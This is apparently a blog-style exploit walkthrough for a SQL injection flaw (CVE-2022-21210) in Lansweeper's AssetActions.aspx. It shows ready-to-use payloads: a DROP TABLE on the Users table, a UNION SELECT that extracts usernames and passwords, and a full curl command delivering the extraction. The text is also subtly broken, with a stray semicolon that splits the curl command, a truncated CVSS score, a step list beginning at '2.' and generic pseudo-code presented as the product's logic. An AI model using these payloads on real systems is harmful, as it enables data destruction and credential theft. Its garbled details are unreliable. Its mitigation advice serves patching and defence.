CVE-2022-21210 - SQL Injection Vulnerability in Lansweeper AssetActions.aspx (Exploit Details & Walkthrough)

CVE-2022-21210 is a critical SQL injection vulnerability discovered in Lansweeper version 9.1.20.2, specifically within the AssetActions.aspx functionality. With simple manipulation, an attacker who has valid login credentials can potentially execute malicious SQL code on the database by sending a specially-crafted HTTP request.

In this long read, we’ll break down what this vulnerability is, how it works, walk through a practical exploit example with code, and provide resources for further reading. If you’re running Lansweeper 9.1.20.2 or below, you need to understand and address this risk right now.

CVSS Score: ~8. (High, due to authentication requirement)

SQL injection occurs when user-supplied input is unsafely concatenated into database queries. Here, attackers can exploit the way AssetActions.aspx processes HTTP parameters to run unauthorized SQL commands, just by being logged in.

Vulnerable Endpoint

POST /AssetActions.aspx

The Problem

The page expects various POST parameters, such as AssetID, which are *not* sanitized before being used in SQL statements.

Example vulnerable code logic (pseudo-code)

// C#
string assetId = Request["AssetID"]; // Not sanitized!
string query = "SELECT * FROM Assets WHERE AssetID = " + assetId;
// ... executes the query directly

Notice: By injecting SQL syntax into the AssetID field, you can manipulate the SQL query.

Let's look at what an attacker might do.

Suppose you’re logged in as a normal user. Using a tool like Burp Suite or curl, you intercept a POST request to /AssetActions.aspx when performing any asset action.

A normal POST to trigger some action might look like

POST /AssetActions.aspx HTTP/1.1
Host: your.lansweeper.server
Cookie: ASP.NET_SessionId=...
Content-Type: application/x-www-form-urlencoded

AssetID=1234&Action=delete

To test for SQL injection, you alter the AssetID parameter

AssetID=1234; DROP TABLE Users;--&Action=delete

Or to extract data, use a UNION-based attack

AssetID=1234 UNION SELECT 1,username,password FROM Users--&Action=delete

Full Example Using curl

curl -k -X POST "https://your.lansweeper.server/AssetActions.aspx"; \
    -H "Cookie: ASP.NET_SessionId=YOURSESSIONID" \
    -d "AssetID=1234 UNION SELECT 1,username,password FROM Users--&Action=delete"

If the server is vulnerable, the response will contain extra rows, columns, or even expose password hashes.

Login to Lansweeper as a normal user.

2. Go to any asset management page and intercept the request with Burp Suite, Fiddler, or browser dev tools.

Mitigation

- Upgrade Lansweeper immediately (check Lansweeper Changelog).

References

- CVE-2022-21210 at NIST
- Lansweeper Official Site
- PortSwigger SQLi Cheat Sheet
- Lansweeper Security Advisory
- OWASP SQL Injection Guide

Final Thoughts

SQL injection is one of the most widespread and dangerous web vulnerabilities. CVE-2022-21210 is particularly impactful due to its presence in popular IT software. While this Lansweeper flaw requires login access, many organizations have scores of users with some degree of account on such systems.

If you use Lansweeper:
Patch now, audit user access, and consider regular security reviews of all business-critical software.


Disclaimer:
This post is for educational purposes only. Test only in environments you are authorized to access.

Timeline

Published on: 04/14/2022 20:15:00 UTC
Last modified on: 04/21/2022 15:58:00 UTC